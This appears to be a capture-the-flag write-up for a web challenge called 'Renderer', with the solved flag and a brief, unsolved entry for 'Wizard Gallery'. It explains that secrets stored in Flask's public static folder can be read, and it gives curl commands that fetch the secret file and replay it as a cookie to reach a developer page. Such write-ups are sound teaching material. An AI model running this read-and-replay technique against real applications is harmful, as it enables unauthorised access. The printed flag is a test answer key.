web

Challenges

Renderer

Introducing Renderer! A free-to-use app to render your images!

• chall.zip

 unzip -l chall.zip
Archive:  chall.zip
  Length      Date    Time    Name
---------  ---------- -----   ----
     1790  2025-07-21 08:39   app.py
        0  2025-07-18 10:31   templates/
      380  2025-07-18 10:31   templates/upload.html
      390  2025-07-18 10:49   templates/display.html
        0  2025-07-18 10:38   static/
        0  2025-07-21 08:37   static/uploads/
        0  2025-07-21 08:41   static/uploads/secrets/
        0  2025-07-21 08:41   static/uploads/secrets/secret_cookie.txt
       20  2025-07-21 08:42   flag.txt
---------                     -------
     2580                     9 files

Read a "secret" file that's stored in a directory that Flask automatically exposes via static file serving.

1. Storing secrets in the static/ directory (which Flask serves publicly)

2. Not implementing proper access control

# Step 1: Trigger secret generation (this will fail but create the secret)
curl "http://play.scriptsorcerers.xyz:10188/developer"

# Step 2: IMMEDIATELY read the newly generated secret
SECRET=$(curl -s "http://play.scriptsorcerers.xyz:10188/static/uploads/secrets/secret_cookie.txt")

# Step 3: Use the secret before it gets regenerated
curl -H "Cookie: developer_secret_cookie=$SECRET" "http://play.scriptsorcerers.xyz:10188/developer"

• scriptCTF{my_c00k135_4r3_n0t_s4f3!_edd23d3198a4}

Wizard Gallery

The council's top priority is to protect the flag, no matter the cost. Oh hey look, it's a photo gallery. What could go wrong?

• Wizard-Gallery.zip

breh